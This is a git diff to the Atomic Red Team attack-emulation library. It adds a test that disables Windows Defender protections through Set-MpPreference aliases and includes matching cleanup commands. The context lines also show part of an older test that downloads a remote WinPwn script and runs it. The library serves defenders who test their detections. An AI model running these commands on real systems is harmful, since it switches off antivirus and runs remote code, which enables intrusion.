diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 569814e5..5cad3045 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -302,6 +302,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 9bdce6f5..ad6e3f4c 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -227,6 +227,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,27,Disable Defender with Defen
 defense-evasion,T1562.001,Disable or Modify Tools,28,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,29,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,30,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,31,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
 defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 4e82a18a..a1f34e7a 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -440,6 +440,7 @@
   - Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
   - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
   - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
+  - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
 - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 117c4ca2..bb292eeb 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -336,6 +336,7 @@
   - Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
   - Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
   - Atomic Test #30: WinPwn - Kill the event log services for stealth [windows]
+  - Atomic Test #31: Tamper with Windows Defender ATP using Aliases - PowerShell [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 66efdaec..5450808d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -17520,6 +17520,26 @@ defense-evasion:
           net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom
           -consoleoutput -noninteractive  "
         name: powershell
+    - name: Tamper with Windows Defender ATP using Aliases - PowerShell
+      auto_generated_guid: c531aa6e-9c97-4b29-afee-9b7be6fc8a64
+      description: |
+        Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
+        in Windows settings.
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          Set-MpPreference -drtm $True
+          Set-MpPreference -dbm $True
+          Set-MpPreference -dscrptsc $True
+          Set-MpPreference -dbaf $True
+        cleanup_command: |
+          Set-MpPreference -drtm 0
+          Set-MpPreference -dbm 0
+          Set-MpPreference -dscrptsc 0
+          Set-MpPreference -dbaf 0
+        name: powershell
+        elevation_required: true
   T1601:
     technique:
       x_mitre_platforms:
diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md
index 42449571..ef7fbdb1 100644
--- a/atomics/T1562.001/T1562.001.md
+++ b/atomics/T1562.001/T1562.001.md
@@ -66,6 +66,8 @@ Adversaries may also tamper with artifacts deployed and utilized by security too
 
 - [Atomic Test #30 - WinPwn - Kill the event log services for stealth](#atomic-test-30---winpwn---kill-the-event-log-services-for-stealth)
 
+- [Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell](#atomic-test-31---tamper-with-windows-defender-atp-using-aliases---powershell)
+
 
 <br/>
 
@@ -1291,4 +1293,43 @@ inv-phantom -consoleoutput -noninteractive
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #31 - Tamper with Windows Defender ATP using Aliases - PowerShell
+Attempting to disable scheduled scanning and other parts of Windows Defender ATP using set-MpPreference aliases. Upon execution Virus and Threat Protection will show as disabled
+in Windows settings.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c531aa6e-9c97-4b29-afee-9b7be6fc8a64
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+Set-MpPreference -drtm $True
+Set-MpPreference -dbm $True
+Set-MpPreference -dscrptsc $True
+Set-MpPreference -dbaf $True
+```
+
+#### Cleanup Commands:
+```powershell
+Set-MpPreference -drtm 0
+Set-MpPreference -dbm 0
+Set-MpPreference -dscrptsc 0
+Set-MpPreference -dbaf 0
+```
+
+
+
+
+
 <br/>